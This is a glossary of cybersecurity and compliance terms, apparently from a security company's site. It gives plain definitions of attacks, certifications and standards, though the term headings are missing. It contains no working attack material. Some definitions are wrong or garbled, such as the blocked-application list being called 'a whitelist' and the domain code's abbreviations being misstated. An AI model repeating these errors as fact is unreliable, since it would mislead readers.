Cyber Security Jargon Buster

Definition: official recognition that an organisation has the competence and impartiality to perform certification, testing, audits and inspections.

Within cyber and information security standards this usually refers to the accreditation a certifying body receives in order to be able to audit and certify that other organisations adhere to specific standards. For example an organisation needs to be IASME accredited in order to audit your organisation to award a Cyber Essentials certificate.

Definition: a computer program that performs tasks on behalf of a user or another program.

Definition: scanning of devices with the use of a software application installed on the target systems. This can provide deeper insight.

Definition: scanning without the installation of additional software agents or components on the target systems or devices. This is less intrusive but may provide limited information.

Definition: authorised applications for use within organisations. Also referred to as a whitelist.

Definition: software designed to detect, prevent and remove malicious software such as trojans, viruses and worms.

Definition: penetration testing where an ethical hacker has no knowledge of the system they are attacking. This simulates an attempted hack that comes from outside of an organisation.

Definition: hackers who have malicious or criminal intent.

Definition: in a simulated cyber-attack, the blue team are responsible for defending the systems. Larger organisations will often organise their cyber security teams into Blue and Red teams.

Definition: a network of compromised devices (referred to as bots) that are controlled by a single malicious actor. These botnets can be used for cybercrime such as launching distributed denial-of-service (DDoS) attacks, sending spam, or stealing information.

Definition: an incident in which data, computer systems or networks are accessed or affected resulting in a compromise on the confidentiality, integrity or availability of information or data.

Definition: the practice of allowing employees to use their own computer devices for work purposes. This may be cost-effective, but comes with new cyber security considerations to be made.

Definition: a hacking technique where an attacker attempts to gain access to a system or account by trying many possible combinations of passwords until the correct one is found.

Definition: developing strategies and process to ensure that an organisation can continue operating, or quickly recover, in the event of unexpected disruptions such as cyber-attacks.

Definition: a certification that demonstrates an individual’s ability to apply best practices to cloud security architecture, design and more.

Definition: a certification awarded to individuals who have demonstrated their expertise in identifying and addressing security vulnerabilities and weaknesses in computer systems, networks, and applications. These individuals carry out security testing.

Definition: a certification for professionals who manage an enterprise’s information security. Focuses on governance, risk management, and compliance.

Definition: an organisation that has been accredited.

Definition: converts a message from plaintext into ciphertext.

Definition: Encrypted data.

Definition: using a network of remote servers hosted on the internet to store, manage and process data and run applications, rather than doing these tasks on a local computer or server.

Definition: a standardised way to identify and reference specific vulnerabilities. This is a list of publicly disclosed information about security vulnerabilities.

Definition: a framework for assessing and scoring the severity of security vulnerabilities.

This is the automated process of continuously scanning computer systems, applications, or networks for weaknesses. In the case of Cyber Safe, the information found is presented in an interactive dashboard, allowing for real-time remediation.

Definition: a professional body for individuals and organisations engaged in penetration testing and cybersecurity assessment services. To become a member of CREST you must undertake assessments.

Definition: an attacker injects malicious code into trusted web pages viewed by other users, which is then ran by victims who view the web page.

Definition: the unaudited version of Cyber Essentials Plus. A basic self-assessment questionnaire that is a requirement before undergoing assessment for Cyber Essentials Plus.

Definition: a government-backed cyber security scheme that uses certification and assessment to allow organisations to demonstrate their level of protection.

Definition: the protection of devices, services, applications, networks, and the information on them.

Definition: an area of the internet that is only accessible through software such as Tor, typically using onion or I2P domains.

Definition: an attack where a computer is used to flood a server or computer network with packets to overload it and cause it to crash or behave slowly.

Definition: unauthorised applications that are blocked within organisations to protect systems from potentially harmful applications. Also referred to as a whitelist.

Definition: evidence of a user’s online activity that they have left behind.

Definition: a type of DoS attack that uses a network of devices to flood a server or computer network. This network of devices that is used in the attack is referred to as a botnet.

Definition: a collection of interconnected devices

Definition: a unique code assigned to every website domain to help identify which registrar has control over that domain. Sometimes called an Internet Provider Security Tag (IPS), registrar tag or Extensible Provisioning Protocol (EPS).

Definition: a unique name that identifies a website on the internet. For example, meliuscyber.com. This is made up of the name of the website (MeliusCyber) and the extension or suffix (.com).

Definition: a certification designed for professionals who respond to and manage cybersecurity incidents.

Definition: the process of converting plain text into “encrypted” text or secret code to make it unreadable to those without the encryption key.

Definition: a device that connects to a network and is therefore susceptible to cyber threats.

Definition: a strategy recommended by the Australian Cyber Security Centre that outlines eight essential strategies for mitigating cyber threats and enhancing cyber security.

Definition: someone who uses their hacking abilities for legal and legitimate purposes such as security testing. Not to be confused with the certification Certified Ethical Hacker.

Definition: to take advantage of a vulnerability in a system.

Definition: a regulatory body in the United Kingdom responsible for overseeing financial markets, firms, and ensuring the protection of consumers.

Definition: a digital barrier that protects your computer or network from unwanted or harmful internet traffic.

Definition: a certification that validates a practitioner’s ability to find and mitigate significant security flaws in systems and networks. Individuals with this certification can conduct advanced penetration tests and simulate behaviour of real attackers.

Definition: a body that provides cyber security certifications of all types.

Definition: a cloud-based service provided by Google that allows organisations to manage and secure mobile devices and endpoints used by their employees.

A feature within Google Workspace that allows organizations to manage and secure mobile devices, such as smartphones and tablets, that access Google services.

Definition: an open-source vulnerability scanner.

Definition: penetration testing where the penetration tester has limited knowledge of a system’s internal workings. They may have some information but not complete access or knowledge.

Definition: a mix between white hat and black hat hackers. These hackers may sometimes violate laws or ethical standards, but do not have the malicious intent of a black hat hacker.

Definition: someone who uses their computer skills to gain unauthorised access to computer systems, networks, or data.

Definition: a decoy system or trap to attract potential cybercrime perpetrators. It mimics a vulnerable system and is used to gather information about attackers, their activities, and their tactics.

Definition: the foundation of the world wide web. HTTP is used to load pages on the internet, and can be thought of as the delivery system for information.

Definition: a secure version of HTTP used for secure communication over the internet. This version encrypts the HTTP requests and responses using SSL.

Definition: a cyber security standard designed to help small and medium enterprises become cyber safe.

Definition: a systematic approach to managing an organisation’s information security. It includes policies, processes, procedures and technologies to protect sensitive information.

Definition: someone within an organisation who has access to its systems and data, making them a potential risk for security breaches or data leaks.

Definition: a worldwide association of accreditation bodies. Its primary function is to develop a single worldwide program of conformity assessment which reduces risk for business and its customers by assuring them that accredited certificates may be relied upon. The IAF ensures that the organisations responsible for giving out certifications follow proper rules and standards.

Definition: a professional organisation that focuses on data privacy and security. Privacy laws and regulations vary from country to country, the IAPP takes a global approach by providing a framework and resources that help privacy professionals navigate the varying landscape of privacy laws.

Definition: a numerical label assigned to each device in a computer network that uses the Internet Protocol for communication. It is used as an identifier.

Definition: a peer-to-peer anonymous network layer tool which creates anonymous browsing.

Definition: an international qualification that allows individuals to demonstrate competency in data protection and compliance under GDPR.

The full name for this is standard is ISO/IEC 27001.

Definition 2022: Where ISO and IEC stand for the International Organisation for Standardisation and the International Electrotechnical Commission. 2022 refers to the year of the version in question. an internationally recognised standard for information security management systems (ISMS).

Definition: an extension from ISO 27001, it focuses on the privacy element of information security.

Definition: a popular programming language used in website development.

Definition: a type of malware that unknowingly records keystrokes made by the victim, often leading to theft of personal information or login credentials.

Definition: malicious software. Software that is designed to disrupt, damage or be gain unauthorised access to a computer system.

Definition: this attack occurs when a malicious actor intercepts traffic on a network, either eavesdropping on the data communicated or manipulating the data as it travels.

Definition: steps that organisations and individuals can take to minimise and address risks.

Definition: a system that helps organisations control and secure mobile devices used by employees, ensuring data security and policy enforcement.

Definition: a security method that requires users to provide two or more types of verification. Usually something you remember, like a password and something you physically hold on your person such as a phone.

Other examples include a PIN code and a fingerprint scan, or an SMS verification. This adds an extra layer of security to protect against unauthorised access.

Definition: part of the U.S. Department of Commerce, NIST is a United States government agency that develops and promotes standards, guidelines and best practices for cyber security.

Definition: a remote tool that scans for vulnerabilities in devices and applications.

Definition: two or more computers linked enabling shared resources.

Definition: an online self-assessment tool that all organisations must use and be compliant with if they have access to NHS patient data and systems.

Definition: a cyber security certification that demonstrates capability in ethical hacking and penetration testing. It is sought after by many professionals and is known for its challenging assessment.

Definition: software that is publicly available for use and has their code freely available for sharing and modification.

Definition: the process of identifying, acquiring, testing and applying software updates (patches) to fix security weaknesses. This is essential to remaining secure and requires daily scanning to ensure it remains up to date.

Definition: a set of security controls that protect payment card data.

Definition: an ethical hacker simulates a cyber-attack on your computer system, network, or application, then provides a report on the weak points that are found.

Definition: a form of social engineering in which a victim is deceived into giving up their personal information. That may be passwords, financial information, or other sensitive data. This typically occurs through emails, false websites, or text messages.

Definition: a financial services sector regulatory body in the United Kingdom that creates financial policies for firms to follow. The PRA also acts as a watchdog for these policies.

Definition: a collaboration between both the red team and the blue team. Together, they can assess and improve an organisation’s security by simulating attacks and defenses.

Definition: a type of malware which demands a ransom payment from the infected victim. Typically, the victim’s files are forcibly encrypted, and a payment is required to decrypt them.

Definition: a group of ethical hackers that are authorised and organised to simulate a cyber attack against an organisation’s security.

Definition: the process of identifying, prioritising and addressing issues, vulnerabilities or weaknesses in an organisation’s systems, networks or processes.

Definition: also known as Remote Administration Tool – this is a type of malware in which is tricked into installing a malicious file onto their computer. Once installed, an attacker has complete visibility of the victim’s computer – including but not limited to real-time screen monitoring, file explorer access, real-time web cam monitoring, remote file execution, keystroke logger.

Definition: a digital certificate that encrypts data between a web browser and a server. The certificate authenticates the identity of a website owner and establishes a secure connection. Without an SSL certificate, browsers will show warnings to users who enter your website with messages such as “your connection is not secure” or “your connection is not private”.

Definition: phishing but via SMS.

Definition: an audit standard developed by the American Institute of Certified Public Accountants that evaluates a service organisation’s controls over financial reporting.

Definition: an audit standard developed by the American Institute of Certified Public Accountants that evaluates controls related to security, availability, processing integrity, confidentiality and privacy. Generally adopted by orgaisation active in the US market.

Definition: a malicious actor deceives a victim in order to manipulate them and gain something.

Definition: a targeted and personalised form of phishing.

Definition: the placement of malicious code in SQL statements to manipulate or access databases. This can lead to the theft of data or malicious alteration of data.

Definition: SSL certificates are only valid for a set time. After just over one year (13 months), they must be renewed.

Definition: a programming language designed for managing data held in a relational database.

Definition: a review audit to ensure that an organisation is still adhering to the key elements of an ISO standard. Typically conducted annually.

Definition: a certification that demonstrates an individual’s expertise in identifying and addressing security vulnerabilities in web applications. These individuals have demonstrated knowledge of web application exploits and penetration testing methodology.

Definition: a browser which allows you to access .onion links, enabling (almost) anonymous communication

Definition: a detailed overview of the threats and weaknesses to your business, allowing for effective remediation management.

Definition: a type of malware that is disguised as legitimate software.

Definition: the government-backed national accreditation body for the United Kingdom. They assess and accredits organisations providing certification, testing, inspection and calibration services against internationally agreed standards.

Definition: a system that regulates who is authorised to enter a computer system, as well as what actions they are authorised to make within the system.

Definition: malware that can self-replicate and spread from one computer to another by attaching themselves to host files.

Definition: a weakness in a security system that can be exploited or triggered by a threat source.

Definition: this refers to the scanning of systems to check for any vulnerabilities found within our common vulnerabilities and exposures list.

Definition: high-profile individuals who are valuable targets for cyber-attacks. These individuals often have access to sensitive data, large amounts of money, or have decision-making authority.

Definition: a targeted phishing campaign that targets high-profile individuals (or “whales”) such as top executives, government officials, or celebrities.

Definition: a form of penetration testing where the penetration tester has full access and complete knowledge of the target that is being tested.

Definition: malware that can spread through systems and through network connections, emails, or other means. Worms often spread through exploitation of vulnerabilities within an operating system.

Definition: a vulnerability that has not yet been disclosed to the programmer or vendor responsible for the application.